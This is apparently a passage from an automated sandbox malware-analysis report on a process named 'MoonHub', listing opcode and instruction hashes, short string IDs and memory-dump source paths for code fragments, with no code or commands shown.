                                                                                                                                                                                • Opcode ID: cd9f47e9b348058c473a45cad92a29056c63e71cbedc55252faeaa2cf6a7ee0f
                                                                                                                                                                                • Instruction ID: 54b009d8c70c67e1a4ee8879769ae54ccde01b2220474faeb2e25ac9e0806642
                                                                                                                                                                                • Opcode Fuzzy Hash: cd9f47e9b348058c473a45cad92a29056c63e71cbedc55252faeaa2cf6a7ee0f
                                                                                                                                                                                • Instruction Fuzzy Hash: 3581073190D7C95FE762A77898155EABFE0FF46750F0901FBD488CB093DA2C190A8796
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: a=j
                                                                                                                                                                                • API String ID: 0-267129293
                                                                                                                                                                                • Opcode ID: e03909eae344bfff9972482a6a55c302b8701210eb3dbc6a72e759aa22e4946f
                                                                                                                                                                                • Instruction ID: 9319a3c1900be4ec271d093b46a105f34f9748cc5e128e6adff29cfde63917cf
                                                                                                                                                                                • Opcode Fuzzy Hash: e03909eae344bfff9972482a6a55c302b8701210eb3dbc6a72e759aa22e4946f
                                                                                                                                                                                • Instruction Fuzzy Hash: 2881223680DB995FE766A73458251F97FE0FF56790F0901FBD488CB093EA28190B8792
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H
                                                                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                                                                • Opcode ID: fc7f55ab5612f1a16430fd7c8b1b1652793e63532535fe796a7b82b421d24afd
                                                                                                                                                                                • Instruction ID: d41e94112c2e149cb832e5775ac92b2d66db634393dd33d0eeb68a1ceed56bff
                                                                                                                                                                                • Opcode Fuzzy Hash: fc7f55ab5612f1a16430fd7c8b1b1652793e63532535fe796a7b82b421d24afd
                                                                                                                                                                                • Instruction Fuzzy Hash: E1915E30918A4E8FDB89EF58C894AEEB3B1FF54344F540579D81AC7296DF79A842CB40
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H_H
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H
                                                                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                                                                • Opcode ID: e5de54e82b36a6e62a8effe5b663499bd4c855c68db7feb439e30acc0c8de3c5
                                                                                                                                                                                • Instruction ID: f6eef3a9ec21811ec00256fc0d9b848eddfaee41d2fec060716d3d02c86e5060
                                                                                                                                                                                • Opcode Fuzzy Hash: e5de54e82b36a6e62a8effe5b663499bd4c855c68db7feb439e30acc0c8de3c5
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A213074918A4E8FDB88EF58C898AE973F1FF68304F544579D42AC7296DF35A842CB40
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: c=j
                                                                                                                                                                                • API String ID: 0-208192931
                                                                                                                                                                                • Opcode ID: 3fa9c1541f1c98ecd7071c1c1cf4d55f2c835224c82a7354da2b0fa930f76eff
                                                                                                                                                                                • Instruction ID: 9453edabb5e4a5e6c3f01a55011fdee22de4825b487548c77334c449ecdf464d
                                                                                                                                                                                • Opcode Fuzzy Hash: 3fa9c1541f1c98ecd7071c1c1cf4d55f2c835224c82a7354da2b0fa930f76eff
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F11B412D0E696AFE790B7B82C552A13BD0FF16688F5440B6E488C71A3DB6C6C058266
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H
                                                                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                                                                • Opcode ID: 1d6ed1ae9c653d00a49105640ad59f5f0e6d555f96a645ba4ed98b4f38f7447e
                                                                                                                                                                                • Instruction ID: 3b350a7f853478f00f514a8994382f801cfe5815d0ec46739cedc1ec7a4ef0db
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d6ed1ae9c653d00a49105640ad59f5f0e6d555f96a645ba4ed98b4f38f7447e
                                                                                                                                                                                • Instruction Fuzzy Hash: 29215430A0CA4A4FEBC9FF2884517E977D2FFA5744F1445A4D41DC728ADE38E8428784
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: c=j
                                                                                                                                                                                • API String ID: 0-208192931
                                                                                                                                                                                • Opcode ID: a9b99e8d547903a26305d0eb8c6820879e7c42620221af1a9e85e01a58d74bbe
                                                                                                                                                                                • Instruction ID: a19cb72dd5245425420e38a8d810ceea17b8859d214032f28aed8a788ae6097e
                                                                                                                                                                                • Opcode Fuzzy Hash: a9b99e8d547903a26305d0eb8c6820879e7c42620221af1a9e85e01a58d74bbe
                                                                                                                                                                                • Instruction Fuzzy Hash: A5110812D1DA57AFE6D077FC28552A03BC0FF09AC8F8400B6E888C71A3DA6D6C458296
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: x6=j
                                                                                                                                                                                • API String ID: 0-1755713205
                                                                                                                                                                                • Opcode ID: 8eab01303d3bb2e7b100d676b6c036c284af160a5465b7f1a1216f3d63f676e0
                                                                                                                                                                                • Instruction ID: e33abc4dc77289d8950db91cc78e0243aee472e5274a85208f18f76a8b36f8d6
                                                                                                                                                                                • Opcode Fuzzy Hash: 8eab01303d3bb2e7b100d676b6c036c284af160a5465b7f1a1216f3d63f676e0
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D11217561CE059FCB94FB2CE45596577E2FF9972030906E9D049CB2A6DF24FC018B84
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `=j
                                                                                                                                                                                • API String ID: 0-237927418
                                                                                                                                                                                • Opcode ID: bee6305f6a9b921b6c5eb496b87373c830503cfb18cf71320ad67674c4fb5050
                                                                                                                                                                                • Instruction ID: 8d047c9ff572ea12aec4240dc9e5945bfd1c538b878479e036ad5b88f76a7cef
                                                                                                                                                                                • Opcode Fuzzy Hash: bee6305f6a9b921b6c5eb496b87373c830503cfb18cf71320ad67674c4fb5050
                                                                                                                                                                                • Instruction Fuzzy Hash: 9511E53680D78D5FD711BB7898151E9BFF0FF86250F0501EBD449C7093EA3819558752
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `=j
                                                                                                                                                                                • API String ID: 0-237927418
                                                                                                                                                                                • Opcode ID: ca0f528ec345810b73c2f786c46164d85a6102f0268ec84311b8880a04b4cc68
                                                                                                                                                                                • Instruction ID: 4000488b46b78ed5f8c2dd52cc4d7dca8b4d1e9b751841c60a37188b36e7d7d7
                                                                                                                                                                                • Opcode Fuzzy Hash: ca0f528ec345810b73c2f786c46164d85a6102f0268ec84311b8880a04b4cc68
                                                                                                                                                                                • Instruction Fuzzy Hash: F301283188D7C95FD352A7785C695E57FF0EF86610F0901E7E449C7093D92C19568362
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xc=j
                                                                                                                                                                                • API String ID: 0-2732805584
                                                                                                                                                                                • Opcode ID: b61929c059631d3525d12c601169386835a4039824e422c46575066b5733366f
                                                                                                                                                                                • Instruction ID: 26cc5de57cc2bd9428d76234ab3a25da4d20c24dea78194ccc421729ecc4da74
                                                                                                                                                                                • Opcode Fuzzy Hash: b61929c059631d3525d12c601169386835a4039824e422c46575066b5733366f
                                                                                                                                                                                • Instruction Fuzzy Hash: 5401757172CB406BD308ABAC981626AF7D1EF89740F50457DF44AC3293CE28A8414596
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j
                                                                                                                                                                                • API String ID: 0-638611851
                                                                                                                                                                                • Opcode ID: 29f80936dbf8fd17a6b098f175ca3e365458c72e438b0e5a6bb27c52c40f80a0
                                                                                                                                                                                • Instruction ID: 6c702b6a5bbd49fe064f5774de28fcec5e478cf7ca007ff90b3ce93cfbf26a1e
                                                                                                                                                                                • Opcode Fuzzy Hash: 29f80936dbf8fd17a6b098f175ca3e365458c72e438b0e5a6bb27c52c40f80a0
                                                                                                                                                                                • Instruction Fuzzy Hash: 64F0D132C0D99D6FE365BA7868580B97FA0FF96244F4401FAE449C60A2EA7429068755
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `a=j
                                                                                                                                                                                • API String ID: 0-2499299824
                                                                                                                                                                                • Opcode ID: dba720ef34fec2a61fc6047ad6addf01d11516b15ba9a1f7f181fe1779c5bf78
                                                                                                                                                                                • Instruction ID: 54a9b3630968d1880e8c646135473f547181bc0aea51cdb96c22d532999c6aa1
                                                                                                                                                                                • Opcode Fuzzy Hash: dba720ef34fec2a61fc6047ad6addf01d11516b15ba9a1f7f181fe1779c5bf78
                                                                                                                                                                                • Instruction Fuzzy Hash: BFF0F675C1D78D5FD391F76448690EA7FB0FF42600F0504EAD029C7092EA2858448302
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7e459e9c4948eac31f4cdaa8db1790a2d743fdcf6f03d191c8ccfc7f2089dd10
                                                                                                                                                                                • Instruction ID: 9220039fce5fc5ed22f13a8d95ad299526f9ff0aa17302c91ca02fe10cce1af2
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e459e9c4948eac31f4cdaa8db1790a2d743fdcf6f03d191c8ccfc7f2089dd10
                                                                                                                                                                                • Instruction Fuzzy Hash: ECC11E34618A4E8FDBC8EF1CC494AAA73E2FF98744F5445A9D41EC7296CB35E852CB40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ffccb41a16e8b3fa87fdd7e218b236b27cbf0e60119614efc9dc3d9793449ad1
                                                                                                                                                                                • Instruction ID: 02aa249f24665d97f61031492b138ca3bec79c4e8dd025c729018b743ecc6fdf
                                                                                                                                                                                • Opcode Fuzzy Hash: ffccb41a16e8b3fa87fdd7e218b236b27cbf0e60119614efc9dc3d9793449ad1
                                                                                                                                                                                • Instruction Fuzzy Hash: 77C1613091CA4A8FEB94EA18C08077577E1FF94389F644579C44D87686DB3EF886C794
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: eeb9bb971962b77650f48d56de8a3f736ba4fb2caf2b90acc252addc258b9c77
                                                                                                                                                                                • Instruction ID: e9a945d2ca026b9dfbaf04960b82b5cad26298984f983217ffbfff2af0ea0fb4
                                                                                                                                                                                • Opcode Fuzzy Hash: eeb9bb971962b77650f48d56de8a3f736ba4fb2caf2b90acc252addc258b9c77
                                                                                                                                                                                • Instruction Fuzzy Hash: 4DA17C31D0CA895FE765BBB898162F977E0FF46364F0501BAD84DC7193DE78A8068385
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4c84006e3a72ef7f4448c9725fa54d995ded8015259c67c9f6ab570cbc506f06
                                                                                                                                                                                • Instruction ID: 295a95f6039e26aa15ed0145af32f8a4abf39bae701a771e2ecde63a3c7b47cc
                                                                                                                                                                                • Opcode Fuzzy Hash: 4c84006e3a72ef7f4448c9725fa54d995ded8015259c67c9f6ab570cbc506f06
                                                                                                                                                                                • Instruction Fuzzy Hash: 85914531A1CB454FE758EB1C9C864B177E0FB96361F1401BED48AC32A2DB35B846C385
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6c55c407a578984cbbf8cba5022fe00eddf46280d2f403a265a924bdf84195fe
                                                                                                                                                                                • Instruction ID: 6616720ccc58ab60565f856f99abe3b9119fc315f5866ff0fe689e467737b047
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c55c407a578984cbbf8cba5022fe00eddf46280d2f403a265a924bdf84195fe
                                                                                                                                                                                • Instruction Fuzzy Hash: 20C1AF74508A4E8FEBC5EF58C49C7A937E1FB68315F24457E981DCB296DB329892CB00
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 571b54b43f5f9808f81440d5779748ecd71e376ea82b88e336dcc459d7ef52ef
                                                                                                                                                                                • Instruction ID: 3c6c09453ad01fd25756affcfa317e0b9756236ea7cb720023c9298a7fff5209
                                                                                                                                                                                • Opcode Fuzzy Hash: 571b54b43f5f9808f81440d5779748ecd71e376ea82b88e336dcc459d7ef52ef
                                                                                                                                                                                • Instruction Fuzzy Hash: F0A1E331A0DA868FEB55FFA898112B977A1FF42398F0401BAD449871D7DF7EA801C355
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b78fd1af7d365cf10cbd518d5798d06a44fc1f34332dd2510d967b3fa456c647
                                                                                                                                                                                • Instruction ID: 8cb60c522a04172d3c00e13402cb3b6248cd305237b3ca935856f28d0de9720d
                                                                                                                                                                                • Opcode Fuzzy Hash: b78fd1af7d365cf10cbd518d5798d06a44fc1f34332dd2510d967b3fa456c647
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C81343280D78A4FE766EB749C151F57FE0FF86660F0801BAD488CB193DB29581AC792
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 322eec19a252a2695b85cb2166ee5da81223052f8eedafa95e909c97241cce22
                                                                                                                                                                                • Instruction ID: 662a729e3580c8a309535605ec922053f32fd05e77658663bf20c586cf9c598e
                                                                                                                                                                                • Opcode Fuzzy Hash: 322eec19a252a2695b85cb2166ee5da81223052f8eedafa95e909c97241cce22
                                                                                                                                                                                • Instruction Fuzzy Hash: 26715772B0CA565FE319FB2DE4A11F57B90FF85368B0841B7D08DCB193DE24A8068398
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 05ac0ef1d71747a4470740e1854065d0de982238362d48667ab95a249647f63f
                                                                                                                                                                                • Instruction ID: 8711be5a1c06b04fad66fb4142b34f46efc72a0045f997e6b81f6935d5206e55
                                                                                                                                                                                • Opcode Fuzzy Hash: 05ac0ef1d71747a4470740e1854065d0de982238362d48667ab95a249647f63f
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A816F3061CA098FDB58EB18D484A72B3E1FB98354F24457DD05EC7696DA3AFC82CB94
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c05ee2be047f92b721cca91bf62a4d0256a658bfae360639aad1e43ffe159735
                                                                                                                                                                                • Instruction ID: be3e276dffcd5ffe763d474962a1f71f3c984ae32ae92a8a9b63758edf440953
                                                                                                                                                                                • Opcode Fuzzy Hash: c05ee2be047f92b721cca91bf62a4d0256a658bfae360639aad1e43ffe159735
                                                                                                                                                                                • Instruction Fuzzy Hash: 4571AF31A1CA068FE768EA18D441A71B3D2FB94354F24457DC48AC3696DF39F8868B44
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c89ad4d39755ba9e18bb5c77478bfa6b9740b91ba2727b6330f0d7c694fac9a7
                                                                                                                                                                                • Instruction ID: 1f81c76e1d98927ea4152bc737e96171ad753e1fe8161d74f3144c56fe2f8951
                                                                                                                                                                                • Opcode Fuzzy Hash: c89ad4d39755ba9e18bb5c77478bfa6b9740b91ba2727b6330f0d7c694fac9a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E71E171A1CE4A5FD7A8EB2C80456B677D1FBA5260F0445BED08FC3197DE39A4068391
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                • Opcode Fuzzy Hash: f66baa07c7c2233445f2fbe22698a336f48de4660a2f97f00a1ebb6cc5a7f5b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B512931A0DA4E1FDBA2FA2898945B27BE2FF65390B1441FAC44CC7196DF39AC46C740
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2915a7b6ad42a756f86d4230eb9461c930402b3b0e52c8dd62ed949640ca7a0b
                                                                                                                                                                                • Instruction ID: a8345b87bef9862f9924d021f0ed7743d2f820fb66233cc6fc878fbbabaf1986
                                                                                                                                                                                • Opcode Fuzzy Hash: 2915a7b6ad42a756f86d4230eb9461c930402b3b0e52c8dd62ed949640ca7a0b
                                                                                                                                                                                • Instruction Fuzzy Hash: B1516E70B18A498FDB98FE2CC495A7573E1FB98340B10417EE44FC7296DE35E8458B45
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0a1f1e905dfe71233fc8b8e43eb3ee58a077acd20bbe1ec83f6d45145735614a
                                                                                                                                                                                • Instruction ID: 725e917aa2dfa465ba548cf13cab0a0c7625d1d78398ff7361be03cc90eff639
                                                                                                                                                                                • Opcode Fuzzy Hash: 0a1f1e905dfe71233fc8b8e43eb3ee58a077acd20bbe1ec83f6d45145735614a
                                                                                                                                                                                • Instruction Fuzzy Hash: D761B270209A4A5FDB41EF68C8A5EEAB7E1FF19354F4405F9E459CB252CF38A842CB40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19b2a02b14611e5ef904d89110f8b0a8e20fcce46cef380b7cc8898f2f35a20b
                                                                                                                                                                                • Instruction ID: 929cd76aac16d2da947234646af20c87ba8d5876e9ac9e7f2d5f3f9f36ac8106
                                                                                                                                                                                • Opcode Fuzzy Hash: 19b2a02b14611e5ef904d89110f8b0a8e20fcce46cef380b7cc8898f2f35a20b
                                                                                                                                                                                • Instruction Fuzzy Hash: AD518331E0CA4A8FEB58EBA898556BDB7E2FF98354F140179D00DE3282DB796C018759
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19881c0c6dc9dcdfea11489fb1f7309c7cab9b53dd43344f2fb9d8dda5be3ebe
                                                                                                                                                                                • Instruction ID: c9c4c002d3a1b01772b3fc69afbd605dc1983a2813384b38d6ee22513f9ee19d
                                                                                                                                                                                • Opcode Fuzzy Hash: 19881c0c6dc9dcdfea11489fb1f7309c7cab9b53dd43344f2fb9d8dda5be3ebe
                                                                                                                                                                                • Instruction Fuzzy Hash: 49713A31D096499FDB85FBA4C8556ECBBB1FF55354F4001B9E449AB2A2CFB82845CF04
                                                                                                                                                                                Memory Dump Source
